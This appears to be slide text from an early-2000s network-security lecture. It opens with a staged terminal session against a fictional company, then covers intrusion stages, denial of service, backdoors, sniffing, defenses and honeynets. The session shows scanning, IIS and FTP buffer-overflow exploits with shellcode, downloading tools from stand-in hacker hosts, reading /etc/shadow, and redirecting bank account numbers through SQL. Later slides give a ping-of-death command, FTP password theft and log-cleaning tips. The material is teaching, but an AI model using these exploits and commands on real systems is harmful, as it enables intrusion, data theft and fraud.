Hacking

hacker.com:~$ nslookup
Default Server: ns.hacker.com
Address: 3.1.33.7
> www.billionaireshow.com
Non-authoritative answer:
Name:
www.billionaireshow.com
Address:
172.16.16.5
> exit
hacker.com:~$ nmap -sS 172.16.16.5
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on www.billionaireshow.com (172.16.16.5):
(The 1514 ports scanned but not shown below are in state: closed)
Port
80/tcp
135/tcp
139/tcp
445/tcp
1080/tcp
8080/tcp

State
open
open
open
open
open
open

Service
http
loc-srv
netbios-ssn
microsoft-ds
socks
http-proxy

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

hacker.com:~$ telnet 172.16.16.5 80
Trying 172.16.16.5...
Connected to 172.16.16.5.
Escape character is '^]'.

HEAD / HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 2506
Date: Mon, 01 Oct 2001 15:04:41 GMT
Content-Location:
http://172.16.16.5/postinfo.html
Content-Type: text/html
Server: Microsoft-IIS/5.0
Accept-Ranges: bytes
Last-Modified: Mon, 01 Oct 2001 11:06:52
GMT
ETag: "20c1bf347cfc01:941"
Connection closed by foreign host.
hacker.com:~$ ./idaexploit.sh 172.16.16.5
Connecting . . .
Dumping Shell:
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x=
1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\=
x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c=
\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4=
\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x6=
8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x=
99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\=
xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66=

\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x=
99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\=
x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99=
\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x=
90\x90\x90\x90\x90
Done...
Completing...
...
GET /test.ida?`perl -e 'print "N"x230'`
%u0101%u00b5%u0101%u00b5%u0101%u00b=5%u0101%u00b5=3Dx HTTP/1.0
...
GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=
%u0abf%u00b6=3Dx HTTP/1.0
...
yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE=20
ini.TINY:
Binding cmd.exe: PORT 80...
Finished...ENJOY!
C:\WINNT\system32>
C:\WINNT\system32> cd ..
C:\WINNT> dir
Volume in drive C has no label.
Volume Serial Number is 6446-0F57

Directory of C:\WINNT
08/24/2001
08/24/2001
12/06/1999
12/06/1999
12/06/1999
09/07/2001
12/06/1999
07/21/2000
07/21/2000
09/28/2001
12/06/1999
12/06/1999

07:23p
07:23p
05:00p
05:00p
05:00p
02:00p
05:00p
12:05p
12:05p
04:41p
05:00p
05:00p

36 vb.ini
37 vbaddin.ini
20,240 vmmreg32.dll
366,864 welcome.exe
23 welcome.ini
348 win.ini
256,192 winhelp.exe
269,584 winhlp32.exe
193,296 winrep.exe
288,880 WMSysPrx.prx
9,522 Zapotec.bmp
707 _default.pif

70 File(s)
3,934,990 bytes
29 Dir(s) 7,330,738,176 bytes free
C:\WINNT\system32>
C:\WINNT\system32> tftp.exe -i hackerbox.com GET nmap.exe c:\temp\nmap.exe
C:\WINNT\system32 cd \temp
>
C:\temp>
nmap sP 172.16.16.1-255
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
Host www.billionaireshow.com (172.16.16.5) appears to be up.
Host itguy.billionaireshow.com (172.16.16.176) appears to be up.
Nmap run completed -- 255 IP addresses (2 host(s) up) scanned in 7 second
C:\temp>

C:\temp> nmap O 172.16.16.176

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on itguy.billionaireshow.com (172.16.16.176):
(The 1514 ports scanned but not shown below are in state: closed)
21 /tcp
22/tcp
4045/tcp
6112/tcp

open
open
open
open

ftpd
ssh
lockd
dtspc

TCP Sequence Prediction: Class=random positive increments

Difficulty=33565 (Worthy challenge)
Remote OS guesses: Solaris 8
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
C:\temp> ftp 172.16.16.176
Connected to 172.16.16.176.
220 itguy.billionaireshow.com FTP server ready.
Name (172.16.16.176:hacker): ^C
C:\temp> perl glob.pl 172.16.16.176 anonymous glob@glob.com
RET: 0xbfbfeae8
Align: 1
RET: 0x805baf8
Align: 1
RET: 0x805e23a
Align: 1
220 itguy.billionaireshow.com FTP server (Version 6.00LS) ready.
Logged in as anonymous/glob@glob.com. Sending evil STAT command.

Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
#

Solaris 8

Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
# nslookup
Default Server: billionaireshow.com
Address: 172.16.15.2
> ls billionaireshow.com
[billionaireshow.com]
billionaireshow.com.
billionaireshow.com.
billiondollar
ap.billionaireshow.com
game.ec.billionaireshow.com
> exit
#

NS server = ns.billionaireshow.com
NS server = game.ec.billionaireshow.com
MX server = mail.billionaireshow.com
A
172.16.7.14
A
172.16.7.22

Accounts Payable

Solaris 8

Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
# nslookup
Default Server: billionaireshow.com
Address: 172.16.15.2
> ls billionaireshow.com
[billionaireshow.com]
billionaireshow.com.
billionaireshow.com.
billiondollar
ap.billionaireshow.com
game.ec.billionaireshow.com

NS server = ns.billionaireshow.com
NS server = game.ec.billionaireshow.com
MX server = mail.billionaireshow.com
A
172.16.7.14
A
172.16.7.22

> exit
# telnet 172.16.6.14 22
Trying 172.16.16.14...
Connected to 172.16.16.14.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

Connection closed by foreign host.

# ssh l lp ap.billionaireshow.com
lps password:
Authentication successful.
Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
lp@AP /home$
lp@AP /home$ uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
lp@AP /home$

Accounts Payable

Solaris 8

SunOS 5.8

Connection closed by foreign host.

# ssh l lp ap.billionaireshow.com
lps password:
Authentication successful.
Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
lp@AP /home$
lp@AP /home$ uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
lp@AP /home$ cd /
lp@AP /$
bam
bin
opt
var

ls
etc
home
proc
vakkk

lost+found root
mnt
sbin
oracle9

tmp
usr
dev
idxs

boot
lib

lp@AP /home$ cd /tmp

lp@AP /tmp$ ftp hackertoolz.com
Connected to hackertoolz.com.
220 SMACK FTP server (Version 5.6(1) Tue Jun 27 10:52:28 PDT 2000) ready.
Name (hackertoolz.com:lp): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> get dtprintinfoBO.c

200 PORT command successful.

150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
226 ASCII Transfer complete.
200 PORT command successful.
150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
226 ASCII Transfer complete.
local: dtprintinfoBO.c remote: dtprintinfoBO.c
1558 bytes received in 0.014 seconds (107.57 Kbytes/s)
ftp> bye
221 Goodbye.
lp@ap /tmp$ gcc o sploit dtprintinfoBO.c
lp@ap /tmp$ ./sploit
HACKBOX...admintool Overflow Exploits.
creating...ADJUST1::2.......done
creating...ADJUST2::1.......done
creating...BUFSIZE1::1000.......done
creating...BUFSIZE2::800.......done
creating...OFFSET::3600.......done
creating...OFFSET2::400....done
Sending Shell.......
\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68
\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10
\x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0
\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82
\x10\x20\x01\x91\xd0\x20\x08
....done

ENJOY YOUR NEW BOX!

whoami
#
root
#
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
# head /etc/shadow
root:h1QbJ57QWWmVY:11177:0:::::
bin:*:11038:0:99999:7:::
daemon:*:11038:0:99999:7:::
adm:*:11038:0:99999:7:::
lp:*:11038:0:99999:7:::
sync:*:11038:0:99999:7:::
shutdown:*:11038:0:99999:7:::
halt:*:11038:0:99999:7:::
mail:*:11038:0:99999:7:::
#

# sqlplus
SQL> describe accounts
Name

Null?

Type

------------------

--------

-----------

LNAME
FNAME
ADDR1
ADDR2
ZIP
PHONE
SSN
BANK
ROUTING_NUM
ACCOUNT_NUM

NOT NULL VARCHAR2(20)

NOT NULL VARCHAR2(15)
NOT NULL VARCHAR2(30)
NOT NULL VARCHAR2(30)
NOT NULL NUMBER(5)
NOT NULL CHAR(12)
NOT NULL NUMBER(9)
NOT NULL VARCHAR2(30)
NOT NULL NUMBER(9)
NOT NULL NUMBER(12)

SQL> select ACCOUNT_NUM, ROUTING_NUM from accounts

ACCOUNT_NUM
-----------

ROUTING_NUM

-----------

8811101011
8822822281
4922929481
5594492295
6839186571
3985792816

060101015
060192911
069882211
069592215
062798581
061873710

0985949922
320984581
2092028481
204098285
6096780914
098029820
4098320921
450982091
6098509449
095098209
4090921109
609830329
6987329810
908848828
4987298731
984598472
5098222091
095509860
0983039311
098098571
SQL> update accounts set ACCOUNT_NUM = 0069858915 where LNAME = '*';
SQL> update accounts set ROUTING_NUM = 6695922941 where LNAME = '*';
SQL> select LNAME, ACCOUNT_NUM, ROUTING_NUM from accounts where LNAME = '*';
LNAME
----Young
Varick
Brantley
Weinstein
Davis
Reynard
Halpert
Davis
Kennedy
Scott
Michaels
Noojin

ACCOUNT_NUM
----------- ----------0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915

ROUTING_NUM
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941

The current state of the Internet

An unprotected computer on the
Internet WILL BE EXPLOITED
within 24 hours!
Richard Treece, ISS, 15 April 2002

Hacker Techniques

Find and attack the weakest link

Reconnaissance
Gain access to first machine
Use acquired access to gain further access

Disclaimer
Hacking is illegal!
Some actual organizations and computers are
used in the examples,
but only to provide realism

Do not hack the examples!

TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)

27

Reconnaissance
Public information
www
news postings

Network Scanning
Operating System Detection

War-dialing

Public Info: www.internic.net

Domain Name: GATECH.EDU
Registrant:
Georgia Institute of Technology, 258 4TH St, Atlanta,
GA 30332
Contacts:
Administrative Contact: Herbert Baines III
GA Institute of Tech (GATECH-DOM), 258 4TH St.,
Atlanta, GA 30332
(404) 894-0226, herbert.baines@oit.gatech.edu
Technical Contact: OIT, Georgia Tech 258 Fourth
Street Atlanta, GA 30332
(404) 894-0226, hostmaster@gatech.edu
Name Servers:
TROLL-GW.GATECH.EDU 130.207.244.251
GATECH.EDU 130.207.244.244
NS1.USG.EDU 198.72.72.10

Public Information: news postings

Author: rajeshb <rajeshb@ncs.com.sg>
Date: 1998/12/07
Forum: comp.unix.solaris
author posting history
Hi,
Could someone tell me how to configure anonymous ftp for
multiple IP addresses. Basically we are running virtual
web
servers on one server. We need to configure anonymous ftp
for each virtual web account. I appreciate it if someone
can
help me as soon as possible. I know how to configure an
anonymous ftp for single IP.
Thanks,
Rajesh.

Network Scanning
Identifies:
accessible machines
servers (ports) on those machines

Network Scanning (contd)

nmap -t -v hack.me.com
21
23
37
53
70
79
80
109
110
111
113
143
513
514
635

tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp

ftp
telnet
time
domain
gopher
finger
http
pop-2
pop-3
sunrpc
auth
imap
login
shell
unknown

Operating System Detection

Stack fingerprinting:
OS vendors often interpret specific RFC
guidance differently when implementing their
versions of TCP/IP stack.
Probing for these differences gives educated
guess about the OS
e.g., FIN probe, dont fragment it

nmap -O

War-dialing
Find the organizations modems,
by calling all of its phone numbers

www.fbi.gov: (202) 324-3000

Reverse Business Phone: 202-324-3
All Listings
Government Offices-US
US Field Ofc
1900 Half St Sw
Washington, DC

202-324-3000

TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)

35

Denial of Service (DOS)

(Source: Chapter 14 Network Intrusion Detection An Analysts Handbook, Second Edition, Northcutt and Novak)

1)

SMURF ICMP echos

2)

ECHO-CHARGEN UDP port 7 is echo; UDP port 19 is character generator.

Spoof a source address and two victims pound each other

3)

TEARDROP Send fragments with offset too small

source.40909 > target.3826 : udp 28 (frag 242 : 36 @ 0+)
source.40909 > target.3826 : 28 (frag 242 : 4 @ 24)+)
fragment ID = 242 with 36 bytes of data starting at offset 0
fragment ID = 242 with 4 bytes of data starting at offset 24
but this means we must back up from 36 bytes already received to 24 where
this goes.
Negative numbers may look like large positive numbers, put in other programs
section of memory
If intrusion detection system (IDS) does not support packet reassembly check,
will get past the IDS

Denial of Service (DOS)

4) PING OF DEATH On a windows NT box type
ping L 65510 <victim IP address>
This creates a packet when reassembled that is larger than the
max size of 65,535 that is allowed. Causes system crash.
- Max IP packet size allowed = 65535
- ICMP echo has a pseudo header consisting of 8 bytes of
ICMP header info
- Next in the ICMP packet is the ping data that is sent
- Maximum amount of data can send is
65535 20 IP 8 ICMP = 65507
- We sent 65510 which is too large
5) LAND ATTACK Source IP address/Port equals Dest IP Address/Port

Denial of Service (DOS)

6) NMAP Scans looking for open ports. You may download from www.insecure.org
Can crash unpatched systems
Can use many modes:
Vanilla TCP connect scanning
TCP SYN (half open scanning)
TCP FIN, xmas, or null (stealth) scanning
TCP ftp proxy (bounce attack) scanning (uses ftp port 20 to connect even though
not established by connection to port 21 as is normal procedure)
SYN FIN Scanning using IP fragments
UDP raw ICMP port unreachable scanning
ICMP scanning (ping-sweep)
TCP Ping Scanning
Remote OS identification by TCP/IP Finger Printing

Distributed Denial of Service (DDOS)

Client machine used to coordinate attack
Master or Handler controls subservient computers
Agents or Daemons Actually do the attack
1)

TRINOO Sends UDP floods to random destination port numbers on victim

2)

TFN Sends UDP flood, TCP SYN Flood, ICMP Echo Flood, or a SMURF Attack
Master communicates to daemon using ICMP echo reply, changes IP identification
number and payload of ICMP echo reply to identify type of attack to launch.

3) TFN2k First DDOS for windows. Communication between master and agents
can be encrypted over TCP, UDP, or ICMP with no identifying ports
4) STACHELDRAHT - Combination of Trinoo and TFN
If you are a DDOS victim, at present this is very little you can do about it!!!

TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)

40

The Holy Grail

Hackers seek Superuser /Root Privilege
(SUID) on the machine they are exploiting
With SUID privilege, the own the machine
They can use the resources available for
their own purposes (e.g.. crack passwords)
or destroy data on the machine

Gaining SUID privilege

1. Easiest way

trying default manufacturer password settings

2. Next Easiest Social Engineering

Impersonate Tech Support

Hide trojan software inside free games,
screensavers, etc. (e.g.. Anna Kournikova)

3. More Difficult Buffer Overflow Attack

Must be a skilled programmer

Gain access to first machine

Configuration errors
System-software errors

Configuration errors: NFS

$ showmount -e hack.me.com
export list for hack.me.com:
/home (everyone)

Config errors: anonymous ftp (#1)

$ ftp hack.me.com
Connected to hack.me.com.
220 xyz FTP server (SunOS) ready.
Name (hack.me.com:jjyuill): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> get /etc/passwd
/etc/passwd: Permission denied
ftp> cd ../etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (152.1.75.170,32871)
(0 bytes).
226 ASCII Transfer complete.

Config errors: anonymous ftp (#2)

ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd
(152.1.75.170,32872) (23608 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
23962 bytes received in 0.14 seconds (1.7e+02
Kbytes/s)
ftp> quit
221 Goodbye.

Config errors: anonymous ftp (#3)

$ less passwd
sam:0Ke0ioGWcUIFg:100:10:NetAdm:/home/sam:/bin/csh
bob:m4ydEoLScDlqg:101:10:bob:/home/bob:/bin/csh
chris:iOD0dwTBKkeJw:102:10:chris:/home/chris:/bin/csh
sue:A981GnNzq.AfE:103:10:sue:/home/sue:/bin/csh
$ Crack passwd
Guessed sam [sam]
Guessed sue [hawaii]

System-software errors: imapd (#1)

imapd buffer-overflow
$ telnet hack.me.com 143
Trying hack.me.com...
Connected to hack.me.com
Escape character is '^]'.
* OK hack.me.com IMAP4rev1 v10.205 server
ready
AUTH=KERBEROS

System-software errors: imapd (#2)

sizeof(mechanism)==2048
sizeof(tmp)==256
char *mail_auth (char *mechanism,
authresponse_t resp,int argc,char *argv[])
{
char tmp[MAILTMPLEN];
AUTHENTICATOR *auth;
/* make upper case copy of mechanism name */
ucase (strcpy (tmp,mechanism));

Get further access (#1)

If user access, try to gain root
usually via a bug in a command which runs as
root
e.g. lprm for RedHat 4.2 (4/20/98)

Run crack on /etc/passwd

users often have the same password on
multiple machines

Get further access (#2)

Exploit misconfigured file permissions in users
home directory
e.g. echo + + >> .rhosts
Format of entries: [+|-] [host] [+|-] [user]

If root, install rootkits

Trojans, backdoors, sniffers, log cleaners

Packet Sniffing
ftp and telnet passwords
e-mail
Lotus Notes

Log cleaners
Start with syslog.conf, edit log files, Wzap wtmp file
Edit shell history file (or disable shell history)

TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)

52

Back Doors

Back Doors
1. Allows hackers to come back at their leisure.
2. Can exist at application level

Back Orifice

3. Can exist at system level

Replace dlls in NT system

Replace functions in Linux/Unix e.g. login, ps, etc.

4. Can exist at root level

Most difficult to detect

5. Some root kits increase the security of a system and

are used by network administrators on their own
systems!

Packet Sniffing
firewall

router
ISP

work station
mail server

Internet

work station
web and ftp
server

work st.

work st.

Sniffing: Captured Passwords

Source IP.port

Destination IP.port

333.22.112.11.3903-333.22.111.15.23: login [root]

333.22.112.11.3903-333.22.111.15.23: password [sysadm#1]
333.22.112.11.3710-333.22.111.16.23: login [root]
333.22.112.11.3710-333.22.111.16.23: password [sysadm#1]
333.22.112.91.1075-333.22.112.94.23: login [lester]
333.22.112.91.1075-333.22.112.94.23: password [l2rz721]
333.22.112.64.1700-444.333.228.48.23: login [rcsproul]
333.22.112.64.1700-444.333.228.48.23: password [truck]

TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)

57

Internet Relay Chat

1. Some hackers, when they exploit a system,
announce it to the hacker community.
2. This is normally done by script kiddies as
bragging rights.
3. A sophisticated hacker on the other hand, will
most likely cover his/her tracks so that you will
never know that they got into your systems.

Hacker Techniques

Find and attack the weakest link

Reconnaissance
Gain access to first machine,
Use acquired access to gain further access

How to protect your computer

1. Make sure your software is current and up to
date (i.e. all current patches are installed)
2. Run Firewall software

http://www.zonealarm.com

3. Run a Hardware firewall

4. Run Intrusion Detection Software

SNORT http://www.snort.org

5. Run Tripwire (change tracking software)

http://www.tripwire.com

Honeynets

Honeypots
A security resource whos value lies in being
probed, attacked or compromised.
Has no production value, anything going to
or from a honeypot is likely a probe, attack or
compromise.

Advantages / Disadvantages
Advantages
Reduce false negatives and false positives
Collect little data, but data of high value
Minimal resources
Conceptually simple
Disadvantages
Single point of failure
Risk

What is a Honeynet

High-interaction honeypot
Used primarily to learn about the bad guys.
Network of production systems.
Once compromised, the data collected is used
to learn the tools, tactics, and motives of the
blackhat community.

How it works
A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.
Any traffic entering or leaving the Honeynet
is suspect by nature.

http://project.honeynet.org/papers/honeynet/

Risk
Honeynets are highly complex, requiring
extensive resources and manpower to
properly maintain.
Honeynets are a high risk technology. As a
high interaction honeypot, they can be used
to attack or harm other non-Honeynet
systems.

Legal Issues
Privacy
Entrapment
Liability

Privacy
No single statute concerning privacy
Electronic Communication Privacy Act (18
USC 2701-11)
Federal Wiretap Statute (Title III, 18 USC
2510-22)
The Pen/Trap Statute (18 USC 3121-27)

Entrapment
Used only by defendant to avoid
conviction.
Cannot be held criminally liable for
entrapment.
Applies only to law enforcement
Even then, most legal authorities
consider Honeynets non-entrapment.

Upstream liability

Any organization may be liable if a Honeynet

system is used to attack or damage other nonHoneynet systems.
Decided at state level, not federal
Civil issue, not criminal

This is why the Honeynet Project focuses so

much attention on Data Control.